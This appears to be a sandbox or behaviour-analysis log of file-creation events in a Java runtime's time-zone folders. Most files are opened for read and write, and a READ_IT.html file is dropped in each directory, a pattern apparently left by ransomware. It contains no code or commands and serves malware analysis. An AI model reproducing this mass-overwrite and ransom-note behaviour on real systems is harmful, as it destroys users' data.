Create	C:\Program Files (x86)\Java\jre7\lib\zi\Etc\GMT-8	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Etc\GMT-9	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Etc\UCT	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Etc\UTC	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Australia\Adelaide	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Australia\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Australia\Brisbane	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Australia\Broken_Hill	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Australia\Currie	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Australia\Darwin	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Australia\Eucla	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Australia\Hobart	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Australia\Lindeman	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Australia\Lord_Howe	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Australia\Melbourne	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Australia\Perth	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Australia\Sydney	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Atlantic\Azores	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Atlantic\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Atlantic\Bermuda	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Atlantic\Canary	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Atlantic\Cape_Verde	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Atlantic\Faroe	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Atlantic\Madeira	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Atlantic\Reykjavik	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Atlantic\South_Georgia	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Atlantic\Stanley	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Atlantic\St_Helena	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Aden	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Almaty	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Amman	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Anadyr	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Aqtau	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Aqtobe	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Ashgabat	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Baghdad	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Bahrain	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Baku	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Bangkok	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Beirut	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Bishkek	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Brunei	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Choibalsan	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Chongqing	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Colombo	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Damascus	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Dhaka	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Dili	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Dubai	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Dushanbe	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Gaza	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Harbin	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Hebron	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Hong_Kong	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Hovd	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Ho_Chi_Minh	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Irkutsk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Jakarta	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Jayapura	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Jerusalem	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Kabul	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Kamchatka	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Karachi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Kashgar	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Kathmandu	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Khandyga	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Kolkata	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Krasnoyarsk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Kuala_Lumpur	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Kuching	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Kuwait	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Macau	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Magadan	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Makassar	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Manila	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Muscat	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Nicosia	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Novokuznetsk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Novosibirsk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Omsk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Oral	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Phnom_Penh	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Pontianak	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Pyongyang	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Qatar	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Qyzylorda	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Rangoon	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Riyadh	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Riyadh87	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Riyadh88	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Riyadh89	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Sakhalin	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Samarkand	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Seoul	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Shanghai	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Singapore	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Taipei	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Tashkent	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Tbilisi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Tehran	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Thimphu	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Tokyo	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Ulaanbaatar	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Urumqi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Ust-Nera	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Vientiane	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Vladivostok	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Yakutsk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Yekaterinburg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Asia\Yerevan	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Antarctica\Casey	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Antarctica\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Antarctica\Davis	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Antarctica\DumontDUrville	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Antarctica\Macquarie	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Antarctica\Mawson	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Antarctica\Palmer	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Antarctica\Rothera	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Antarctica\Syowa	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Antarctica\Troll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Antarctica\Vostok	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Adak	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Anchorage	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Antigua	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Araguaina	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Asuncion	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Atikokan	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Bahia	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Bahia_Banderas	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Barbados	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Belem	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Belize	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Blanc-Sablon	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Boa_Vista	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Bogota	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Boise	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Cambridge_Bay	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Campo_Grande	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Cancun	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Caracas	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Cayenne	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Cayman	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Chicago	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Chihuahua	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Costa_Rica	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Creston	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Cuiaba	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Curacao	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Danmarkshavn	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Dawson	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Dawson_Creek	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Denver	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Detroit	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Edmonton	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Eirunepe	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\El_Salvador	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
